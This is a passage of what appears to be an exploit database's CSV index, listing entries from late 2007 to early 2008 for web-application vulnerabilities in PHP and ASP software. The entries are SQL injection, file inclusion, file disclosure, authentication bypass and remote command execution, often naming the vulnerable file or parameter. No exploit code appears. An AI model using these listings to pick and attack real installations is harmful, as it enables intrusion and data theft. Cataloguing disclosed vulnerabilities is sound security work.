Injections",2007-11-27,KiNgOfThEwOrLd,php,webapps, -4666,exploits/php/webapps/4666.txt,"Eurologon CMS - 'files.php' Arbitrary File Download",2007-11-27,KiNgOfThEwOrLd,php,webapps, -4667,exploits/php/webapps/4667.txt,"PHP-Nuke NSN Script Depository 1.0.0 - Remote Source Disclosure",2007-11-27,KiNgOfThEwOrLd,php,webapps, -4668,exploits/php/webapps/4668.txt,"wpQuiz 2.7 - Multiple SQL Injections",2007-11-27,Kacper,php,webapps, -4669,exploits/php/webapps/4669.txt,"project alumni 1.0.9 - 'index.php?act' Local File Inclusion",2007-11-27,tomplixsee,php,webapps, -4670,exploits/php/webapps/4670.txt,"PHP-CON 1.3 - 'include.php' Remote File Inclusion",2007-11-28,GoLd_M,php,webapps, -4671,exploits/php/webapps/4671.txt,"EHCP 0.22.8 - Multiple Remote File Inclusions",2007-11-28,MhZ91,php,webapps, -4672,exploits/php/webapps/4672.txt,"Charrays CMS 0.9.3 - Multiple Remote File Inclusions",2007-11-28,MhZ91,php,webapps, -4674,exploits/php/webapps/4674.txt,"TuMusika Evolution 1.7R5 - Remote File Disclosure",2007-11-28,GoLd_M,php,webapps, -4675,exploits/php/webapps/4675.txt,"NoAh 0.9 pre 1.2 - 'filepath' Remote File Disclosure",2007-11-28,GoLd_M,php,webapps, -4676,exploits/php/webapps/4676.txt,"Web-MeetMe 3.0.3 - 'play.php' Remote File Disclosure",2007-11-29,Evil.Man,php,webapps, -4677,exploits/php/webapps/4677.txt,"WebED 0.0.9 - 'index.php' Remote File Disclosure",2007-11-29,GoLd_M,php,webapps, -4678,exploits/php/webapps/4678.php,"Seditio CMS 121 - SQL Injection",2007-11-29,InATeam,php,webapps, -4679,exploits/php/webapps/4679.txt,"KML share 1.1 - 'region.php?layer' Remote File Disclosure",2007-11-29,GoLd_M,php,webapps, -4680,exploits/php/webapps/4680.txt,"LearnLoop 2.0beta7 - 'sFilePath' Remote File Disclosure",2007-11-29,GoLd_M,php,webapps, -4681,exploits/php/webapps/4681.txt,"ftp Admin 0.1.0 - Local File Inclusion / Cross-Site Scripting / Authentication Bypass",2007-11-29,Omni,php,webapps, -4684,exploits/php/webapps/4684.txt,"tellmatic 1.0.7 - Multiple Remote File Inclusions",2007-12-01,ShAy6oOoN,php,webapps, -4685,exploits/php/webapps/4685.txt,"Rayzz Script 2.0 - Local/Remote File Inclusion",2007-12-01,Crackers_Child,php,webapps, -4686,exploits/php/webapps/4686.txt,"phpBB Garage 1.2.0 Beta3 - SQL Injection",2007-12-03,maku234,php,webapps, -4687,exploits/asp/webapps/4687.html,"Snitz Forums 2000 - 'Active.asp' SQL Injection",2007-12-03,BugReport.IR,asp,webapps, -4691,exploits/php/webapps/4691.txt,"Joomla! / Mambo Component rsgallery 2.0b5 - 'catid' SQL Injection",2007-12-05,K-159,php,webapps, -4693,exploits/php/webapps/4693.txt,"SineCMS 2.3.4 - Calendar SQL Injection",2007-12-05,KiNgOfThEwOrLd,php,webapps, -4694,exploits/php/webapps/4694.txt,"EZContents 1.4.5 - 'index.php?link' Remote File Disclosure",2007-12-05,p4imi0,php,webapps, -4695,exploits/php/webapps/4695.txt,"WordPress Plugin PictPress 0.91 - Remote File Disclosure",2007-12-05,GoLd_M,php,webapps, -4696,exploits/php/webapps/4696.txt,"SerWeb 2.0.0 dev1 2007-02-20 - Multiple Local/Remote File Inclusion Vulnerabilities",2007-12-06,GoLd_M,php,webapps, -4697,exploits/asp/webapps/4697.txt,"MWOpen E-Commerce - 'leggi_commenti.asp' SQL Injection",2007-12-06,KiNgOfThEwOrLd,asp,webapps, -4704,exploits/php/webapps/4704.txt,"PolDoc CMS 0.96 - 'download_file.php' File Disclosure",2007-12-08,GoLd_M,php,webapps, -4705,exploits/php/webapps/4705.txt,"Flat PHP Board 1.2 - Multiple Vulnerabilities",2007-12-09,KiNgOfThEwOrLd,php,webapps, -4706,exploits/php/webapps/4706.txt,"Content Injector 1.53 - 'index.php' SQL Injection",2007-12-09,S.W.A.T.,php,webapps, -4707,exploits/php/webapps/4707.txt,"Ace Image Hosting Script - 'id' SQL Injection",2007-12-09,t0pP8uZz,php,webapps, -4708,exploits/php/webapps/4708.txt,"DWdirectory 2.1 - SQL Injection",2007-12-09,t0pP8uZz,php,webapps, -4709,exploits/php/webapps/4709.txt,"SH-News 3.0 - 'comments.php' SQL Injection",2007-12-09,hadihadi,php,webapps, -4710,exploits/php/webapps/4710.txt,"Lotfian.com DATABASE DRIVEN TRAVEL SITE - SQL Injection",2007-12-10,"Aria-Security Team",php,webapps, -4711,exploits/php/webapps/4711.txt,"Falt4 CMS rc4 10.9.2007 - Multiple Vulnerabilities",2007-12-10,"H-Security Labs",php,webapps, -4712,exploits/php/webapps/4712.txt,"falcon CMS 1.4.3 - Remote File Inclusion / Cross-Site Scripting",2007-12-10,MhZ91,php,webapps, -4714,exploits/php/webapps/4714.pl,"MonAlbum 0.87 - Arbitrary File Upload / Password Grabber",2007-12-10,v0l4arrra,php,webapps, -4718,exploits/php/webapps/4718.rb,"SquirrelMail G/PGP Encryption Plugin - 'deletekey()' Command Injection",2007-12-11,Backdoored,php,webapps, -4719,exploits/php/webapps/4719.txt,"Mcms Easy Web Make - 'index.php?template' Local File Inclusion",2007-12-11,MhZ91,php,webapps, -4721,exploits/php/webapps/4721.txt,"WordPress 2.3.1 - Charset SQL Injection",2007-12-11,"Abel Cheung",php,webapps, -4722,exploits/php/webapps/4722.txt,"ViArt CMS/Shop/Helpdesk 3.3.2 - Remote File Inclusion",2007-12-11,RoMaNcYxHaCkEr,php,webapps, -4725,exploits/php/webapps/4725.txt,"Fastpublish CMS 1.9999 - config[fsBase] Remote File Inclusion",2007-12-12,RoMaNcYxHaCkEr,php,webapps, -4726,exploits/php/webapps/4726.txt,"CityWriter 0.9.7 - 'head.php' Remote File Inclusion",2007-12-13,RoMaNcYxHaCkEr,php,webapps, -4727,exploits/php/webapps/4727.txt,"CMS Galaxie Software - 'category_id' SQL Injection",2007-12-13,MurderSkillz,php,webapps, -4728,exploits/php/webapps/4728.txt,"Mms Gallery PHP 1.0 - 'id' Remote File Disclosure",2007-12-13,GoLd_M,php,webapps, -4729,exploits/php/webapps/4729.txt,"xml2owl 0.1.1 - 'filedownload.php' Remote File Disclosure",2007-12-13,GoLd_M,php,webapps, -4730,exploits/asp/webapps/4730.txt,"hosting controller 6.1 hot fix 3.3 - Multiple Vulnerabilities",2007-12-13,BugReport.IR,asp,webapps, -4731,exploits/php/webapps/4731.php,"Adult Script 1.6 - Unauthorized Administrative Access",2007-12-13,Liz0ziM,php,webapps, -4733,exploits/php/webapps/4733.txt,"123tkShop 0.9.1 - Remote Authentication Bypass",2007-12-14,"Michael Brooks",php,webapps, -4734,exploits/php/webapps/4734.txt,"Anon Proxy Server 0.1000 - Remote Command Execution",2007-12-14,"Michael Brooks",php,webapps, -4735,exploits/php/webapps/4735.txt,"Oreon 1.4 / Centreon 1.4.1 - Multiple Remote File Inclusion Vulnerabilities",2007-12-14,"Michael Brooks",php,webapps, -4736,exploits/php/webapps/4736.txt,"Form Tools 1.5.0b - Multiple Remote File Inclusions",2007-12-14,RoMaNcYxHaCkEr,php,webapps, -4737,exploits/php/webapps/4737.txt,"PHP Real Estate - 'fullnews.php?id' SQL Injection",2007-12-14,t0pP8uZz,php,webapps, -4738,exploits/php/webapps/4738.txt,"gf-3xplorer 2.4 - Cross-Site Scripting / Local File Inclusion",2007-12-18,MhZ91,php,webapps, -4739,exploits/php/webapps/4739.pl,"MOG-WebShop - 'index.php?group' SQL Injection",2007-12-18,k1tk4t,php,webapps, -4740,exploits/php/webapps/4740.pl,"FreeWebShop 2.2.1 - Blind SQL Injection",2007-12-18,k1tk4t,php,webapps, -4741,exploits/php/webapps/4741.txt,"MySpace Content Zone 3.x - Arbitrary File Upload",2007-12-18,Don,php,webapps, -4743,exploits/php/webapps/4743.pl,"FreeWebShop 2.2.7 - 'cookie' Admin Password Grabber",2007-12-18,k1tk4t,php,webapps, -4750,exploits/php/webapps/4750.txt,"PHPMyRealty 1.0.x - 'search.php' SQL Injection",2007-12-18,Koller,php,webapps, -4753,exploits/php/webapps/4753.txt,"Dokeos 1.8.4 - Arbitrary File Upload",2007-12-18,RoMaNcYxHaCkEr,php,webapps, -4755,exploits/php/webapps/4755.txt,"PhpMyDesktop/Arcade 1.0 Final - 'phpdns_basedir' Remote File Inclusion",2007-12-18,RoMaNcYxHaCkEr,php,webapps, -4758,exploits/php/webapps/4758.txt,"xeCMS 1.x - 'view.php' Remote File Disclosure",2007-12-19,p4imi0,php,webapps, -4762,exploits/php/webapps/4762.txt,"nicLOR CMS - 'sezione_news.php' SQL Injection",2007-12-21,x0kster,php,webapps, -4763,exploits/php/webapps/4763.txt,"NmnNewsletter 1.0.7 - 'output' Remote File Inclusion",2007-12-21,CraCkEr,php,webapps, -4764,exploits/php/webapps/4764.txt,"Arcadem LE 2.04 - 'loadadminpage' Remote File Inclusion",2007-12-21,KnocKout,php,webapps, -4765,exploits/php/webapps/4765.txt,"1024 CMS 1.3.1 - Local File Inclusion / SQL Injection",2007-12-21,irk4z,php,webapps, -4766,exploits/php/webapps/4766.txt,"mBlog 1.2 - 'page' Remote File Disclosure",2007-12-21,irk4z,php,webapps, -4767,exploits/php/webapps/4767.txt,"Social Engine 2.0 - Multiple Local File Inclusions",2007-12-21,MhZ91,php,webapps, -4768,exploits/php/webapps/4768.py,"Shadowed Portal 5.7d3 - Remote Command Execution",2007-12-21,The:Paradox,php,webapps, -4769,exploits/php/webapps/4769.txt,"Shadowed Portal 5.7d3 - 'POST' Remote File Inclusion",2007-12-21,The:Paradox,php,webapps, -4770,exploits/php/webapps/4770.txt,"Wallpaper Site 1.0.09 - 'category.php' SQL Injection",2007-12-22,Koller,php,webapps, -4771,exploits/php/webapps/4771.txt,"IP Reg 0.3 - Multiple SQL Injections",2007-12-22,MhZ91,php,webapps, -4772,exploits/php/webapps/4772.txt,"zBlog 1.2 - SQL Injection",2007-12-22,Houssamix,php,webapps, -4774,exploits/php/webapps/4774.pl,"PHP ZLink 0.3 - 'go.php' SQL Injection",2007-12-23,DNX,php,webapps, -4775,exploits/php/webapps/4775.txt,"Adult Script 1.6.5 - Multiple SQL Injections",2007-12-23,MhZ91,php,webapps, -4776,exploits/php/webapps/4776.txt,"MMSLamp - 'idpro' SQL Injection",2007-12-23,x0kster,php,webapps, -4777,exploits/php/webapps/4777.txt,"WebSihirbazi 5.1.1 - 'pageid' SQL Injection",2007-12-24,bypass,php,webapps, -4778,exploits/php/webapps/4778.txt,"MeGaCheatZ 1.1 - Multiple SQL Injections",2007-12-24,MhZ91,php,webapps, -4779,exploits/php/webapps/4779.php,"CuteNews 1.4.5 - Admin Password md5 Hash Fetching",2007-12-24,waraxe,php,webapps, -4780,exploits/php/webapps/4780.txt,"ThemeSiteScript 1.0 - 'index.php?loadadminpage' Remote File Inclusion",2007-12-24,Koller,php,webapps, -4781,exploits/php/webapps/4781.php,"Jupiter 1.1.5ex - Privilege Escalation",2007-12-24,BugReport.IR,php,webapps, -4782,exploits/php/webapps/4782.txt,"Agares phpAutoVideo 2.21 - Local/Remote File Inclusion",2007-12-24,MhZ91,php,webapps, -4783,exploits/php/webapps/4783.txt,"Joomla! Component mosDirectory 2.3.2 - Remote File Inclusion",2007-12-24,ShockShadow,php,webapps, -4785,exploits/php/webapps/4785.txt,"TeamCalPro 3.1.000 - Multiple Local/Remote File Inclusions",2007-12-25,GoLd_M,php,webapps, -4786,exploits/php/webapps/4786.pl,"AuraCMS 2.2 - Remote Add Administrator",2007-12-25,k1tk4t,php,webapps, -4787,exploits/php/webapps/4787.pl,"RunCMS 1.6 - Get Admin Cookie Blind SQL Injection",2007-12-25,sh2kerr,php,webapps, -4788,exploits/php/webapps/4788.txt,"MailMachine Pro 2.2.4 - SQL Injection",2007-12-25,MhZ91,php,webapps, -4789,exploits/php/webapps/4789.php,"PMOS Help Desk 2.4 - Remote Command Execution",2007-12-25,EgiX,php,webapps, -4790,exploits/php/webapps/4790.txt,"RunCMS 1.6 - Multiple Vulnerabilities",2007-12-25,DSecRG,php,webapps, -4791,exploits/php/webapps/4791.txt,"eSyndiCat Link Exchange Script 2005-2006 - SQL Injection",2007-12-25,EgiX,php,webapps, -4792,exploits/php/webapps/4792.pl,"RunCMS 1.6 - Blind SQL Injection (IDS Evasion)",2007-12-26,sh2kerr,php,webapps, -4793,exploits/php/webapps/4793.txt,"Blakord Portal Beta 1.3.A (All Modules) - SQL Injection",2007-12-26,JosS,php,webapps, -4794,exploits/php/webapps/4794.pl,"XZero Community Classifieds 4.95.11 - Local File Inclusion / SQL Injection",2007-12-26,Kw3[R]Ln,php,webapps, -4795,exploits/php/webapps/4795.txt,"XZero Community Classifieds 4.95.11 - Remote File Inclusion",2007-12-26,Kw3[R]Ln,php,webapps, -4796,exploits/php/webapps/4796.txt,"PNPHPBB2 < 1.2i - 'PHPEx' Local File Inclusion",2007-12-26,irk4z,php,webapps, -4798,exploits/php/webapps/4798.php,"ZeusCMS 0.3 - Blind SQL Injection",2007-12-27,EgiX,php,webapps, -4799,exploits/php/webapps/4799.txt,"Joovili 3.0.6 - 'joovili.images.php' Remote File Disclosure",2007-12-27,EcHoLL,php,webapps, -4800,exploits/php/webapps/4800.txt,"xml2owl 0.1.1 - 'showcode.php' Remote Command Execution",2007-12-28,MhZ91,php,webapps, -4802,exploits/php/webapps/4802.txt,"XCMS 1.82 - Local/Remote File Inclusion",2007-12-28,nexen,php,webapps, -4804,exploits/php/webapps/4804.txt,"Hot or Not Clone by Jnshosts.com - Database Backup Dump",2007-12-28,RoMaNcYxHaCkEr,php,webapps, -4805,exploits/php/webapps/4805.txt,"NoseRub 0.5.2 - Login SQL Injection",2007-12-28,"Felix Groebert",php,webapps, -4807,exploits/php/webapps/4807.php,"jPORTAL 2.3.1 & UserPatch - 'forum.php' Remote Code Execution",2007-12-29,irk4z,php,webapps, -4808,exploits/php/webapps/4808.txt,"Mihalism Multi Forum Host 3.0.x - Remote File Inclusion",2007-12-29,GoLd_M,php,webapps, -4809,exploits/php/webapps/4809.txt,"CCMS 3.1 Demo - SQL Injection",2007-12-29,Pr0metheuS,php,webapps, -4810,exploits/php/webapps/4810.txt,"CMS Made Simple 1.2.2 Module TinyMCE - SQL Injection",2007-12-30,EgiX,php,webapps, -4811,exploits/php/webapps/4811.txt,"kontakt formular 1.4 - Remote File Inclusion",2007-12-30,bd0rk,php,webapps, -4812,exploits/php/webapps/4812.txt,"Mihalism Multi Host 2.0.7 - 'download.php' Remote File Disclosure",2007-12-30,GoLd_M,php,webapps, -4813,exploits/php/webapps/4813.txt,"XCMS 1.83 - Remote Command Execution",2007-12-30,x0kster,php,webapps, -4814,exploits/php/webapps/4814.txt,"Bitweaver R2 CMS - Arbitrary File Upload / Disclosure",2007-12-30,BugReport.IR,php,webapps, -4815,exploits/php/webapps/4815.txt,"matpo bilder galerie 1.1 - Remote File Inclusion",2007-12-30,Crackers_Child,php,webapps, -4816,exploits/php/webapps/4816.txt,"SanyBee Gallery 0.1.1 - 'p' Local File Inclusion",2007-12-30,jackal,php,webapps, -4817,exploits/php/webapps/4817.txt,"w-Agora 4.2.1 - 'cat' SQL Injection",2007-12-30,IHTeam,php,webapps, -4821,exploits/php/webapps/4821.txt,"IPTBB 0.5.4 - 'id' SQL Injection",2007-12-31,MhZ91,php,webapps, -4822,exploits/php/webapps/4822.txt,"MyPHP Forum 3.0 (Final) - Multiple SQL Injections",2007-12-31,x0kster,php,webapps, -4823,exploits/php/webapps/4823.pl,"ZenPhoto 1.1.3 - 'rss.php?albumnr' SQL Injection",2007-12-31,Silentz,php,webapps, -4824,exploits/asp/webapps/4824.py,"oneSCHOOL - 'admin/login.asp' SQL Injection",2007-12-31,Guga360,asp,webapps, -4826,exploits/php/webapps/4826.pl,"WebPortal CMS 0.6.0 - 'index.php' SQL Injection",2007-12-31,x0kster,php,webapps, -4827,exploits/php/webapps/4827.txt,"Joomla! Component PU Arcade 2.1.3 - SQL Injection",2007-12-31,Houssamix,php,webapps, -4828,exploits/php/webapps/4828.txt,"AGENCY4NET WEBFTP 1 - 'download2.php' File Disclosure",2008-01-01,GoLd_M,php,webapps, -4830,exploits/php/webapps/4830.txt,"ClipShare - 'UID' SQL Injection",2008-01-02,Krit,php,webapps, -4831,exploits/php/webapps/4831.txt,"MyPHP Forum 3.0 - 'Final' SQL Injection",2008-01-03,The:Paradox,php,webapps, -4832,exploits/php/webapps/4832.php,"Site@School 2.4.10 - Blind SQL Injection",2008-01-03,EgiX,php,webapps, -4833,exploits/php/webapps/4833.txt,"NetRisk 1.9.7 - Local/Remote File Inclusion",2008-01-04,S.W.A.T.,php,webapps, -4834,exploits/php/webapps/4834.txt,"samPHPweb 4.2.2 - 'db.php' Remote File Inclusion",2008-01-04,Crackers_Child,php,webapps, -4835,exploits/php/webapps/4835.py,"WebPortal CMS 0.6-beta - Remote Password Change",2008-01-04,The:Paradox,php,webapps, -4836,exploits/php/webapps/4836.txt,"samPHPweb 4.2.2 - 'songinfo.php' SQL Injection",2008-01-05,BackDoor,php,webapps, -4837,exploits/php/webapps/4837.pl,"ClipShare 2.6 - Remote User Password Change",2008-01-05,Pr0metheuS,php,webapps, -4838,exploits/php/webapps/4838.txt,"snetworks PHP Classifieds 5.0 - Remote File Inclusion",2008-01-05,Crackers_Child,php,webapps, -4840,exploits/php/webapps/4840.php,"Tribisur 2.0 - SQL Injection",2008-01-05,x0kster,php,webapps, -4841,exploits/php/webapps/4841.txt,"Invision Power Board 2.1.7 - ACTIVE Cross-Site Scripting / SQL Injection",2008-01-05,"Eugene Minaev",php,webapps, -4842,exploits/php/webapps/4842.pl,"NetRisk 1.9.7 - Remote Password Change",2008-01-05,Cod3rZ,php,webapps, -4843,exploits/php/webapps/4843.txt,"MODx CMS 0.9.6.1 - Multiple Vulnerabilities",2008-01-05,BugReport.IR,php,webapps, -4844,exploits/php/webapps/4844.txt,"WordPress Plugin Wp-FileManager 1.2 - Arbitrary File Upload",2008-01-06,Houssamix,php,webapps, -4845,exploits/php/webapps/4845.pl,"RunCMS Newbb_plus 0.92 - Client IP SQL Injection",2008-01-06,"Eugene Minaev",php,webapps, -4846,exploits/php/webapps/4846.txt,"Uebimiau Web-Mail 2.7.10/2.7.2 - Remote File Disclosure",2008-01-06,"Eugene Minaev",php,webapps, -4847,exploits/php/webapps/4847.txt,"XOOPS mod_gallery Zend_Hash_key + Extract - Remote File Inclusion",2008-01-06,"Eugene Minaev",php,webapps, -4848,exploits/asp/webapps/4848.txt,"PortalApp 4.0 - SQL Injection / Cross-Site Scripting / Authentication Bypass",2008-01-06,r3dm0v3,asp,webapps, -4849,exploits/php/webapps/4849.txt,"LoudBlog 0.6.1 - 'parsedpage' Remote Code Execution",2008-01-06,"Eugene Minaev",php,webapps, -4850,exploits/php/webapps/4850.txt,"Horde Web-Mail 3.x - 'go.php' Remote File Disclosure",2008-01-06,"Eugene Minaev",php,webapps, -4851,exploits/php/webapps/4851.txt,"CuteNews 1.1.1 - 'html.php' Remote Code Execution",2008-01-06,"Eugene Minaev",php,webapps, -4852,exploits/php/webapps/4852.txt,"NetRisk 1.9.7 - Cross-Site Scripting / SQL Injection",2008-01-06,"Virangar Security",php,webapps, -4853,exploits/php/webapps/4853.php,"DCP-Portal 6.11 - SQL Injection",2008-01-06,x0kster,php,webapps, -4854,exploits/php/webapps/4854.txt,"SineCMS 2.3.5 - Local File Inclusion / Remote Code Execution",2008-01-06,KiNgOfThEwOrLd,php,webapps, -4855,exploits/php/webapps/4855.txt,"Shop-Script 2.0 - 'index.php' Remote File Disclosure",2008-01-06,Fisher762,php,webapps, -4857,exploits/php/webapps/4857.txt,"OneCMS 2.4 - SQL Injection / Upload",2008-01-07,BugReport.IR,php,webapps, -4858,exploits/php/webapps/4858.pl,"FlexBB 0.6.3 - Cookies SQL Injection",2008-01-07,"Eugene Minaev",php,webapps, -4859,exploits/php/webapps/4859.txt,"EkinBoard 1.1.0 - Arbitrary File Upload / Authentication Bypass",2008-01-07,"Eugene Minaev",php,webapps, -4860,exploits/php/webapps/4860.pl,"EggBlog 3.1.0 - Cookies SQL Injection",2008-01-07,"Eugene Minaev",php,webapps, -4861,exploits/php/webapps/4861.txt,"TUTOS 1.3 - 'cmd.php' Remote Command Execution",2008-01-07,Houssamix,php,webapps, -4863,exploits/php/webapps/4863.pl,"SmallNuke 2.0.4 - Pass Recovery SQL Injection",2008-01-08,"Eugene Minaev",php,webapps, -4864,exploits/php/webapps/4864.txt,"ZeroCMS 1.0 Alpha - Arbitrary File Upload / SQL Injection",2008-01-08,KiNgOfThEwOrLd,php,webapps, -4865,exploits/php/webapps/4865.txt,"evilboard 0.1a - SQL Injection / Cross-Site Scripting",2008-01-08,seaofglass,php,webapps, -4867,exploits/php/webapps/4867.pl,"PHP Webquest 2.6 - 'id_actividad' SQL Injection",2008-01-08,ka0x,php,webapps, -4870,exploits/php/webapps/4870.txt,"osData 2.08 Modules Php121 - Local File Inclusion",2008-01-09,"Cold Zero",php,webapps, -4871,exploits/php/webapps/4871.php,"UploadImage/UploadScript 1.0 - Remote Change Admin Password",2008-01-09,Dj7xpl,php,webapps, -4872,exploits/php/webapps/4872.txt,"PHP Webquest 2.6 - Get Database Credentials",2008-01-09,MhZ91,php,webapps, -4876,exploits/php/webapps/4876.txt,"Tuned Studios Templates - Local File Inclusion",2008-01-09,DSecRG,php,webapps, -4879,exploits/php/webapps/4879.php,"Docebo 3.5.0.3 - 'lib.regset.php' Command Execution",2008-01-09,EgiX,php,webapps, -4880,exploits/php/webapps/4880.php,"DomPHP 0.81 - Remote Add Administrator",2008-01-10,j0j0,php,webapps, -4882,exploits/php/webapps/4882.txt,"MTCMS 2.0 - SQL Injection",2008-01-10,"Virangar Security",php,webapps, -4883,exploits/php/webapps/4883.txt,"DomPHP 0.81 - 'index.php' Remote File Inclusion",2008-01-10,Houssamix,php,webapps, -4884,exploits/php/webapps/4884.php,"Evilsentinel 1.0.9 - Multiple Vulnerabilities Disable",2008-01-10,BlackHawk,php,webapps, -4886,exploits/php/webapps/4886.pl,"iGaming CMS 1.3.1/1.5 - SQL Injection",2008-01-11,"Eugene Minaev",php,webapps, -4887,exploits/php/webapps/4887.html,"DigitalHive 2.0 RC2 - 'user_id' SQL Injection",2008-01-11,j0j0,php,webapps, -4888,exploits/php/webapps/4888.txt,"DomPHP 0.81 - 'cat' SQL Injection",2008-01-11,MhZ91,php,webapps, -4889,exploits/php/webapps/4889.txt,"vcart 3.3.2 - Multiple Remote File Inclusions",2008-01-11,k1n9k0ng,php,webapps, -4890,exploits/php/webapps/4890.txt,"AJchat 0.10 - 'unset''' bug SQL Injection",2008-01-11,"Eugene Minaev",php,webapps, -4891,exploits/php/webapps/4891.php,"Docebo 3.5.0.3 - '/lib.regset.php/non-blind' SQL Injection",2008-01-11,rgod,php,webapps, -4895,exploits/php/webapps/4895.txt,"ImageAlbum 2.0.0b2 - 'id' SQL Injection",2008-01-11,"Raw Security",php,webapps, -4896,exploits/php/webapps/4896.pl,"0DayDB 2.3 - 'id' Remote Authentication Bypass",2008-01-11,Pr0metheuS,php,webapps, -4897,exploits/php/webapps/4897.pl,"photokron 1.7 - Remote Database Disclosure",2008-01-11,Pr0metheuS,php,webapps, -4898,exploits/php/webapps/4898.txt,"Agares phpAutoVideo 2.21 - 'articlecat' SQL Injection (1)",2008-01-12,ka0x,php,webapps, -4899,exploits/php/webapps/4899.txt,"TaskFreak! 0.6.1 - SQL Injection",2008-01-12,TheDefaced,php,webapps, -4900,exploits/asp/webapps/4900.txt,"ASP Photo Gallery 1.0 - Multiple SQL Injections",2008-01-12,trew,asp,webapps, -4901,exploits/php/webapps/4901.txt,"TutorialCMS 1.02 - 'Username' SQL Injection",2008-01-12,ka0x,php,webapps, -4902,exploits/php/webapps/4902.txt,"minimal Gallery 0.8 - Remote File Disclosure",2008-01-13,Houssamix,php,webapps, -4904,exploits/php/webapps/4904.txt,"Binn SBuilder - 'nid' Blind SQL Injection",2008-01-13,JosS,php,webapps, -4905,exploits/php/webapps/4905.pl,"Agares phpAutoVideo 2.21 - 'articlecat' SQL Injection (2)",2008-01-13,Pr0metheuS,php,webapps, -4907,exploits/php/webapps/4907.py,"X7 Chat 2.0.5 - 'day' SQL Injection",2008-01-14,nonroot,php,webapps, -4908,exploits/php/webapps/4908.pl,"Xforum 1.4 - 'topic' SQL Injection",2008-01-14,j0j0,php,webapps, -4910,exploits/asp/webapps/4910.pl,"RichStrong CMS - 'cat' SQL Injection",2008-01-14,JosS,asp,webapps, -4912,exploits/php/webapps/4912.txt,"LulieBlog 1.0.1 - Remote Authentication Bypass",2008-01-15,ka0x,php,webapps, -4914,exploits/php/webapps/4914.txt,"FaScript FaMp3 1.0 - SQL Injection",2008-01-15,"Khashayar Fereidani",php,webapps, -4915,exploits/php/webapps/4915.txt,"FaScript FaName 1.0 - SQL Injection",2008-01-15,"Khashayar Fereidani",php,webapps, -4916,exploits/php/webapps/4916.txt,"FaScript FaPersian Petition - SQL Injection",2008-01-15,"Khashayar Fereidani",php,webapps, -4917,exploits/php/webapps/4917.txt,"FaScript FaPersianHack 1.0 - SQL Injection",2008-01-15,"Khashayar Fereidani",php,webapps, -4919,exploits/php/webapps/4919.txt,"Blog:CMS 4.2.1b - SQL Injection / Cross-Site Scripting",2008-01-16,DSecRG,php,webapps, -4920,exploits/php/webapps/4920.txt,"Aria 0.99-6 - 'page' Local File Inclusion",2008-01-16,DSecRG,php,webapps, -4921,exploits/asp/webapps/4921.txt,"MailBee WebMail Pro 4.1 - Remote File Disclosure",2008-01-16,-=M.o.B=-,asp,webapps, -4922,exploits/php/webapps/4922.txt,"alitalk 1.9.1.1 - Multiple Vulnerabilities",2008-01-16,tomplixsee,php,webapps, -4924,exploits/php/webapps/4924.php,"PixelPost 1.7 - Blind SQL Injection",2008-01-16,Silentz,php,webapps, -4925,exploits/php/webapps/4925.txt,"PHP-RESIDENCE 0.7.2 - 'Search' SQL Injection",2008-01-16,"Khashayar Fereidani",php,webapps, -4926,exploits/php/webapps/4926.pl,"Gradman 0.1.3 - 'agregar_info.php' Local File Inclusion",2008-01-16,JosS,php,webapps, -4927,exploits/php/webapps/4927.php,"MyBulletinBoard (MyBB) 1.2.10 - Remote Code Execution",2008-01-16,Silentz,php,webapps, -4928,exploits/php/webapps/4928.txt,"MyBulletinBoard (MyBB) 1.2.10 - Multiple Vulnerabilities",2008-01-16,waraxe,php,webapps, -4929,exploits/php/webapps/4929.txt,"PHPEcho CMS 2.0 - 'id' SQL Injection",2008-01-17,Stack,php,webapps, -4930,exploits/php/webapps/4930.txt,"Mini File Host 1.2 - 'language' Local File Inclusion",2008-01-17,Scary-Boys,php,webapps, -4933,exploits/php/webapps/4933.pl,"AuraCMS 1.62 - 'stat.php' Remote Code Execution",2008-01-18,k1tk4t,php,webapps, -4936,exploits/php/webapps/4936.txt,"Gradman 0.1.3 - 'info.php' Local File Inclusion",2008-01-18,Syndr0me,php,webapps, -4937,exploits/php/webapps/4937.txt,"Small Axe 0.3.1 - 'cfile' Remote File Inclusion",2008-01-18,RoMaNcYxHaCkEr,php,webapps, -4939,exploits/php/webapps/4939.txt,"WordPress Plugin WP-Forum 1.7.4 - SQL Injection",2008-01-19,"websec Team",php,webapps, -4940,exploits/php/webapps/4940.pl,"Mini File Host 1.2.1 - 'language' Local File Inclusion",2008-01-20,shinmai,php,webapps, -4942,exploits/php/webapps/4942.txt,"TikiWiki < 1.9.9 - 'tiki-listmovies.php' Directory Traversal",2008-01-20,Sha0,php,webapps, -4943,exploits/php/webapps/4943.txt,"Frimousse 0.0.2 - 'explorerdir.php' Local Directory Traversal",2008-01-20,Houssamix,php,webapps, -4944,exploits/php/webapps/4944.txt,"360 Web Manager 3.0 - 'IDFM' SQL Injection",2008-01-20,"Ded MustD!e",php,webapps, -4945,exploits/php/webapps/4945.txt,"bloofox 0.3 - SQL Injection / File Disclosure",2008-01-20,BugReport.IR,php,webapps, -4950,exploits/php/webapps/4950.php,"Coppermine Photo Gallery 1.4.10 - 'cpg1410_xek.php' SQL Injection",2008-01-21,bazik,php,webapps, -4951,exploits/php/webapps/4951.txt,"Mooseguy Blog System 1.0 - 'month' SQL Injection",2008-01-21,The_HuliGun,php,webapps, -4952,exploits/php/webapps/4952.txt,"BoastMachine 3.1 - 'mail.php' id SQL Injection",2008-01-21,"Virangar Security",php,webapps, -4953,exploits/php/webapps/4953.txt,"OZJournals 2.1.1 - 'id' File Disclosure",2008-01-21,shinmai,php,webapps, -4954,exploits/php/webapps/4954.txt,"IDM-OS 1.0 - 'Filename' File Disclosure",2008-01-21,MhZ91,php,webapps, -4955,exploits/php/webapps/4955.txt,"Lama Software 14.12.2007 - Multiple Remote File Inclusions",2008-01-21,QTRinux,php,webapps, -4956,exploits/php/webapps/4956.txt,"Alstrasoft Forum Pay Per Post Exchange 2.0 - SQL Injection",2008-01-21,t0pP8uZz,php,webapps, -4957,exploits/php/webapps/4957.txt,"MoinMoin 1.5.x - 'MOIND_ID' Cookie Login Bypass",2008-01-21,nonroot,php,webapps, -4958,exploits/php/webapps/4958.txt,"aflog 1.01 - Cross-Site Scripting / SQL Injection",2008-01-22,shinmai,php,webapps, -4960,exploits/php/webapps/4960.txt,"Easysitenetwork Recipe - 'categoryId' SQL Injection",2008-01-22,S@BUN,php,webapps, -4961,exploits/php/webapps/4961.php,"Coppermine Photo Gallery 1.4.10 - SQL Injection",2008-01-22,RST/GHC,php,webapps, -4962,exploits/php/webapps/4962.pl,"SetCMS 3.6.5 - Remote Command Execution",2008-01-22,RST/GHC,php,webapps, 